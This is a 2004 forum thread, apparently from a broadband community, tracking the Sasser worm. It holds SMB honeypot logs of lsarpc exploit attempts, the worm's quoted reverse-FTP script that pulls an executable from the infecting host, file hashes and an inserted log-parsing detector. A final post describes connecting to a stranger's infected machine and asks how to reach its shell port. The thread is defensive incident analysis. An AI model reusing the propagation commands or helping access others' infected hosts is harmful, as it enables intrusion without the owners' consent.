Schouw (Netherlands)
Man your battlestations - lsass.exe worm arrived..
I will keep it short.. (it's frickin hectic right now). Please look at »www.f-secure.com/v-descs/sasser.shtml and »www.f-secure.com/weblog/
As predicted..
etoast66 (Caldwell, NJ)
Re: Man your battlestations - lsass.exe worm arrived..
We've been seeing this since about midnight. It's going to be a busy day. »vil.nai.com/vil/content/v_125007.htm
Tablet (Czech)
reply to Schouw
No signs of this worm on our provider's internal network.. It's only a matter of time before someone connects in with an infected notebook.
Symantec write-up: »securityresponse.symantec.com/av···orm.html
kpatz (Manchester, NH)
Now that a lot of broadband ISPs are blocking port 445 (including mine), I have a feeling this one won't affect home users as much as Blaster did.
Oh well, I guess I miss out on the fun this time around, at least until some ID-10-T manages to bring an infection onto the WAN at work.
-- Robert Tappan Morris, Jr., got six months in jail for crashing 10% of the computers that Bill Gates made $100 million crashing last weekend.
psloss (Alpharetta, GA)
said by kpatz : Now that a lot of broadband ISPs are blocking port 445 (including mine), I have a feeling this one won't affect home users as much as Blaster did.
I hope you're right -- and a lot of the blocking was because of Blaster and its immediate aftermath... although there are also lots of ISPs that aren't filtering Windows file sharing and MSRPC. Symantec is still only rating it a 2.
Anyway, I'm pulling logs from a system that is exposed. I took a peek and, as would seem natural, this exploit targets the \lsarpc named pipe. I was actually surprised to not see much in the way of scans prior to the worm's release, but I believe there were a few during this last week.
It also appears that most of the recent exploits on the Windows file sharing ports (MS03-049 comes to mind) base their exploit code on several assumptions about the CIFS servers, but one in particular stands out watching the incoming traffic -- namely that connecting to named pipes will always return a "tree ID" of 2048. (I'm not making that assumption, so those sessions all fail.)
I'll post a couple of log excerpts in a bit...
Philip Sloss -- Feedback? e-mail: stuff@lupwa.org
TheJoker (Alexandria, VA)
reply to Schouw
Re: Man your battlestations - lsass.exe worm arrived..
News of the worm has now even hit cnet at »news.com.com/2100-7349_3-5203764···nefd.top -- TheJoker
psloss (Alpharetta, GA)
reply to Schouw
Re: Man your battlestations - lsass.exe worm arrived..
OK, to illustrate the pre-worm scanning, here's the first entry in my log. This log period began on 13 April; the entry is from 28 April (Wednesday) GMT:
04/28/04 21:32:48 GMT: connection to 66.185.XXX.XXX:445 from 82.224.52.184:1662
04/28/04 21:33:04 GMT: client disconnected
04/28/04 21:33:04 GMT: SMB session ended
04/28/04 21:32:49 GMT: connection to 66.185.XXX.XXX:445 from 82.224.52.184:1672
SMB_COM_SESSION_SETUP_ANDX(1): OS: 'Windows 2002 2600 Service Pack 1', LM: 'Windows 2002 5 .1', Dom: ''
SMB_COM_SESSION_SETUP_ANDX(3): OS: 'Windows 2002 2600 Service Pack 1', LM: 'Windows 2002 5 .1', Dom: '' User: '', Domain: '', WKS: 'KENSHINS'
SMB_COM_TREE_CONNECT_ANDX: '\\66.185.XXX.XXX\IPC$'
SMB_COM_NT_CREATE_ANDX: '\lsarpc' in TID = 0001
SMB_COM_NT_CREATE_ANDX error: object name not found
04/28/04 21:33:04 GMT: client disconnected
04/28/04 21:33:04 GMT: SMB session ended
The first worm session appears to be right after midnight GMT, and it appears to do a test connection and then try the exploit twice:
05/01/04 00:12:01 GMT: connection to 66.185.XXX.XXX:445 from 217.234.47.81:1188
SMB_COM_SESSION_SETUP_ANDX(1): OS: 'Windows 2000 2195', LM: 'Windows 2000 5.0', Dom: ''
SMB_COM_SESSION_SETUP_ANDX(3): OS: 'Windows 2000 2195', LM: 'Windows 2000 5.0', Dom: '' User: '', Domain: '', WKS: 'HOD'
05/01/04 00:12:03 GMT: client disconnected
05/01/04 00:12:03 GMT: SMB session ended
05/01/04 00:12:03 GMT: connection to 66.185.XXX.XXX:445 from 217.234.47.81:1257
SMB_COM_SESSION_SETUP_ANDX(1): OS: 'Windows 2000 2195', LM: 'Windows 2000 5.0', Dom: ''
SMB_COM_SESSION_SETUP_ANDX(3): OS: 'Windows 2000 2195', LM: 'Windows 2000 5.0', Dom: '' User: '', Domain: '', WKS: 'HOD'
SMB_COM_TREE_CONNECT_ANDX: '\\66.185.XXX.XXX\ipc$'
SMB_COM_NT_CREATE_ANDX: '\lsarpc' in TID = 0800
Invalid TreeID = 2048
05/01/04 00:12:05 GMT: SMB session ended
05/01/04 00:12:06 GMT: connection to 66.185.XXX.XXX:445 from 217.234.47.81:1272
SMB_COM_SESSION_SETUP_ANDX(1): OS: 'Windows 2000 2195', LM: 'Windows 2000 5.0', Dom: ''
SMB_COM_SESSION_SETUP_ANDX(3): OS: 'Windows 2000 2195', LM: 'Windows 2000 5.0', Dom: '' User: '', Domain: '', WKS: 'HOD'
SMB_COM_TREE_CONNECT_ANDX: '\\66.185.XXX.XXX\ipc$'
SMB_COM_NT_CREATE_ANDX: '\lsarpc' in TID = 0800
Invalid TreeID = 2048
05/01/04 00:12:07 GMT: SMB session ended
The thing about the TreeID I mentioned before is that these sessions all establish a connection to the IPC$ share. When that occurs, the server gives the client a "key" to refer to that connection -- the TreeID. As with a lot of exploit code, it takes the shortcut of sending "canned" packets, so instead of using the TreeID my server gives back to it, the worm just sends a precompiled packet with a hard-coded TreeID.
This works just fine, though, because there's apparently a convention to always give the IPC$ share connection a hard-coded TreeID. Since the packets for this exploit are precompiled, all the sessions look like this -- unnamed Windows 2000 client in a workgroup named "HOD".
Anyway, the number of these sessions is high; I can't tell whether it's increasing yet, but I suspect so.
Philip Sloss
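A small detector for the canned-packet behaviour Philip describes, added here as an example (it is not from the thread and not his logging tool): it parses the SMB log format shown above, groups lines into tcp/445 sessions, and flags any session that opens the lsarpc pipe under a TreeID the server never issued (the hard-coded 0x0800 = 2048). The sample log lines, client addresses and workstation names are constructed.

```python
import re
from dataclasses import dataclass

# Constructed sample in the format of the SMB logs posted above; the addresses
# are TEST-NET ranges and the second hostname is made up, not taken from the thread.
SAMPLE_LOG = r"""
05/01/04 00:12:03 GMT: connection to 192.0.2.1:445 from 198.51.100.7:1257
SMB_COM_SESSION_SETUP_ANDX(3): OS: 'Windows 2000 2195', LM: 'Windows 2000 5.0', Dom: '' User: '', Domain: '', WKS: 'HOD'
SMB_COM_TREE_CONNECT_ANDX: '\\192.0.2.1\ipc$'
SMB_COM_NT_CREATE_ANDX: '\lsarpc' in TID = 0800
Invalid TreeID = 2048
05/01/04 00:12:05 GMT: SMB session ended
05/01/04 00:20:00 GMT: connection to 192.0.2.1:445 from 203.0.113.9:3001
SMB_COM_SESSION_SETUP_ANDX(3): OS: 'Windows 2002 2600 Service Pack 1', LM: 'Windows 2002 5.1', Dom: '' User: '', Domain: '', WKS: 'FILESRV2'
SMB_COM_TREE_CONNECT_ANDX: '\\192.0.2.1\IPC$'
SMB_COM_NT_CREATE_ANDX: '\lsarpc' in TID = 0001
SMB_COM_NT_CREATE_ANDX error: object name not found
05/01/04 00:20:02 GMT: SMB session ended
"""

CONN_RE = re.compile(r"connection to \S+:445 from (\S+)")
WKS_RE = re.compile(r"WKS: '([^']*)'")
CREATE_RE = re.compile(r"SMB_COM_NT_CREATE_ANDX: '([^']+)' in TID = ([0-9A-Fa-f]+)")

@dataclass
class Session:
    client: str
    wks: str = ""
    pipe: str = ""
    tid: int = -1              # TID the client used on NT_CREATE (logged in hex)
    invalid_tid: bool = False  # server rejected it as a TID it never handed out

def parse_sessions(log: str) -> list:
    """Group the line-oriented log into one Session per inbound tcp/445 connection."""
    sessions, cur = [], None
    for line in log.splitlines():
        if m := CONN_RE.search(line):
            cur = Session(client=m.group(1))
            sessions.append(cur)
        elif cur is None:
            continue
        elif m := WKS_RE.search(line):
            cur.wks = m.group(1)
        elif m := CREATE_RE.search(line):
            cur.pipe, cur.tid = m.group(1), int(m.group(2), 16)
        elif "Invalid TreeID" in line:
            cur.invalid_tid = True
        elif "SMB session ended" in line:
            cur = None
    return sessions

def flag_canned_lsarpc(sessions: list) -> list:
    """Canned-packet signature: lsarpc pipe opened under a TID the server did not
    issue, or under the hard-coded 0x0800 (2048). Returns (client, wks, tid) tuples."""
    return [(s.client, s.wks, s.tid) for s in sessions
            if s.pipe.lower().endswith("lsarpc") and (s.invalid_tid or s.tid == 0x0800)]

if __name__ == "__main__":
    for hit in flag_canned_lsarpc(parse_sessions(SAMPLE_LOG)):
        print("canned lsarpc session from %s (WKS=%r, TID=0x%04x)" % hit)
```

A client that honours the TreeID the server actually returned (the second constructed session, TID 0001) is not flagged even though it also probes the pipe.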
Schouw (Netherlands)
reply to Schouw
Worm.Win32.Sasser.b is ITW..
etoast66 (Caldwell, NJ)
Re: Sasser.b?
said by Schouw : Worm.Win32.Sasser.b is ITW..
Do you have documentation or a link?
psloss (Alpharetta, GA)
reply to Schouw
Re: Man your battlestations - lsass.exe worm arrived..
Here's a graph of the tcp/445 and tcp/9996 activity in the last couple of days... you can see that beginning today the numbers for the ports track together for the most part.
Philip Sloss
Schouw (Netherlands)
reply to etoast66
Re: Sasser.b?
said by etoast66 : said by Schouw : Worm.Win32.Sasser.b is ITW..
Do you have documentation or a link?
Nothing more currently than an entry in KAV's database.
EGeezer
reply to Schouw
Re: Man your battlestations - lsass.exe worm arrived..
Don't know why this topic didn't show in search... So, posting link here for topic search purposes.
»lsass sasser at yellow per Trend Micro
psloss (Alpharetta, GA)
reply to Schouw
I got a copy of the worm pretty much as soon as I opened up tcp/9996 on a pseudo-rshell program. Oddly, the KAV online scanner doesn't detect it yet, but it triggered NAV with updated signatures.
The worm uses what is now a common reverse FTP -- from the infectee back to the infector -- via an echoed script file fed into the FTP command line client (ftp.exe); the guts of the commands are:
open (infector IP) 5554
anonymous
bin
get (executable file)
bye
Another interesting thing is that I have two separate EXEs: a single one with an MD5 of "A73C16CCD0B9C4F20BC7842EDD90FC20", and then all the others (so far) have an MD5 of "1A2C0E6130850F8FD9B9B5309413CD00".
And still here at home, absolutely nothing, thanks to Road Runner blocking tcp/445.
Philip Sloss
Link Logger (Calgary, AB)
reply to Schouw
Re: Man your battlestations - lsass.exe worm arrived..
Nothing here yet, as Thursday night has been our highlight thus far. No traffic on 9996 or 5554 either. I will do some quick tests to see if my ISP is filtering, but they rarely if ever filter anything.
Blake -- Vendor: Firewall Logging Software »www.SonicLogger.com - SonicWall and 3Com »www.LinkLogger.com - Linksys, Netgear and Zyxel
psloss (Alpharetta, GA)
Re: Man your battlestations - lsass.exe worm arrived..
said by Link Logger : Nothing here yet, as Thursday night has been our highlight thus far. No traffic on 9996 or 5554 either. I will do some quick tests to see if my ISP is filtering, but they rarely if ever filter anything.
Hmm... that's sort of strange, although it seems to be picking up, and then it'll be whenever we hit the ceiling of potential victims.
I missed this last night, too, but I'll still take the Stereolab concert over waiting for packets.
Just to be explicit, the traffic on tcp/5554 is outbound and the content is FTP (command). Didn't check to see if the data is normal or passive FTP, but likely the former.
Edit, correction: Duh -- tcp/5554 is outbound for initial infection, but once infected, there's lots of inbound activity on that port.
Philip Sloss
psloss (Alpharetta, GA)
reply to Schouw
Microsoft advisory for home users
"What You Should Know About the Sasser Worm" (nice copy/paste error on the HTML page title) »www.microsoft.com/security/incid···sser.asp
Link Logger (Calgary, AB)
reply to psloss
Re: Man your battlestations - lsass.exe worm arrived..
Ran some scans to ensure that my ISP isn't filtering on 9996 or 5554, so if it's out there then I should be seeing it; however, that isn't to say that they didn't code a feature (some would call it a bug) such that it avoids my netblock like Iraq Oil did.
Blake
breckett
reply to Schouw
Re: Man your battlestations - lsass.exe worm arrived..
@psloss: how did you simulate a rshell? With which software?
psloss (Alpharetta, GA)
reply to Link Logger
Re: Man your battlestations - lsass.exe worm arrived..
said by Link Logger : Ran some scans to ensure that my ISP isn't filtering on 9996 or 5554, so if it's out there then I should be seeing it; however, that isn't to say that they didn't code a feature (some would call it a bug) such that it avoids my netblock like Iraq Oil did.
Blake
Hmm... I guess it's possible, given that F-Secure says it's built with Visual C++, that your netblock is in the hole in the run-time library random number generator... that's assuming the propagation works that way.
It will be interesting to see how good the worm implementation was... if it's like Blaster, then many otherwise vulnerable systems will be spared, but only from this malware. I'll bet lots of the systems infected with this are already operating in Agobot/Phatbot botnets.
The trigger appears to be a tcp/445 connection -- I still haven't seen any activity on the rshell port (9996) here at home because 445 is blocked.
Philip Sloss
breckett
reply to Schouw
Re: Man your battlestations - lsass.exe worm arrived..
I'm trying to catch this virus manually (because I've a firewall). I've an IP of an infected machine. I've connected to this machine on TCP port 5554 and I've seen the FTP server. Now how could I simulate a shell on TCP port 9996? And the name of the infected file is avserve.exe?